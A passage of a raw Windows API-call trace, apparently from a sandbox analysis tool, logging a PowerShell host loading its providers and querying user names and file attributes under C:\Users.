0x23c0a0 [0124.759] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.759] CoTaskMemFree (pv=0x23c0a0) [0124.759] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd8198*="FileSystem", lpRawData=0x2fd7f28) returned 1 [0124.761] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.761] CoTaskMemFree (pv=0x2af480) [0124.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.763] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0124.763] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.764] CoTaskMemFree (pv=0x1b9b0710) [0124.764] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.764] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.764] CoTaskMemFree (pv=0x23c0a0) [0124.765] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fdd9d8*="Function", lpRawData=0x2fdd768) returned 1 [0124.769] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.769] CoTaskMemFree (pv=0x2af480) [0124.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.900] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0124.900] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.901] CoTaskMemFree (pv=0x1b9b0710) [0124.901] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.901] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.902] CoTaskMemFree (pv=0x23c0a0) [0124.902] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3000200*="Registry", lpRawData=0x2ffff90) returned 1 [0124.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.906] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0124.906] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.906] CoTaskMemFree (pv=0x1b9b0710) [0124.907] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.907] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.907] CoTaskMemFree (pv=0x23c0a0) [0124.907] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3005618*="Variable", lpRawData=0x30053a8) returned 1 [0124.912] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.912] CoTaskMemFree (pv=0x2af480) [0124.919] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.919] CoTaskMemFree (pv=0x2af480) [0124.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0124.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0124.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0124.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0125.031] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0125.031] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0125.031] CoTaskMemFree (pv=0x1b9b0710) [0125.031] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0125.031] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0125.032] CoTaskMemFree (pv=0x23c0a0) [0125.032] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3019230*="Certificate", lpRawData=0x3018fc0) returned 1 [0125.042] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.043] CoTaskMemFree (pv=0x2af480) [0125.049] GetLogicalDrives () returned 0x4 [0125.049] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10d170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0125.049] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.051] CoTaskMemAlloc (cb=0x20e) returned 0x2822c0 [0125.051] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2822c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0125.051] CoTaskMemFree (pv=0x2822c0) [0125.054] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.054] CoTaskMemFree (pv=0x2af480) [0125.054] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.054] CoTaskMemFree (pv=0x2af480) [0125.087] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.087] CoTaskMemFree (pv=0x2af480) [0125.095] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.095] CoTaskMemFree (pv=0x2af480) [0125.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.096] SetErrorMode (uMode=0x1) returned 0x1 [0125.096] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.097] SetErrorMode (uMode=0x1) returned 0x1 [0125.097] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.097] SetErrorMode (uMode=0x1) returned 0x1 [0125.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.097] SetErrorMode (uMode=0x1) returned 0x1 [0125.097] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.098] CoTaskMemFree (pv=0x2af480) [0125.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10d070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.128] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0125.128] SetErrorMode (uMode=0x1) returned 0x1 [0125.128] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.128] SetErrorMode (uMode=0x1) returned 0x1 [0125.129] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0125.129] SetErrorMode (uMode=0x1) returned 0x1 [0125.129] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.129] SetErrorMode (uMode=0x1) returned 0x1 [0125.129] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0125.129] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0125.129] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.129] SetErrorMode (uMode=0x1) returned 0x1 [0125.129] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0125.130] SetErrorMode (uMode=0x1) returned 0x1 [0125.130] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.130] SetErrorMode (uMode=0x1) returned 0x1 [0125.130] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0125.130] SetErrorMode (uMode=0x1) returned 0x1 [0125.130] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.130] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x10cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.130] SetErrorMode (uMode=0x1) returned 0x1 [0125.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.131] SetErrorMode (uMode=0x1) returned 0x1 [0125.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.131] SetErrorMode (uMode=0x1) returned 0x1 [0125.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.131] SetErrorMode (uMode=0x1) returned 0x1 [0125.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x10cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.132] SetErrorMode (uMode=0x1) returned 0x1 [0125.132] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.132] SetErrorMode (uMode=0x1) returned 0x1 [0125.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.132] SetErrorMode (uMode=0x1) returned 0x1 [0125.132] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d0f0 | out: lpFileInformation=0x10d0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.132] SetErrorMode (uMode=0x1) returned 0x1 [0125.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x10cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.133] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.133] SetErrorMode (uMode=0x1) returned 0x1 [0125.133] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0125.133] SetErrorMode (uMode=0x1) returned 0x1 [0125.133] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.133] SetErrorMode (uMode=0x1) returned 0x1 [0125.133] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0125.133] SetErrorMode (uMode=0x1) returned 0x1 [0125.134] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0125.134] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x10ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users", 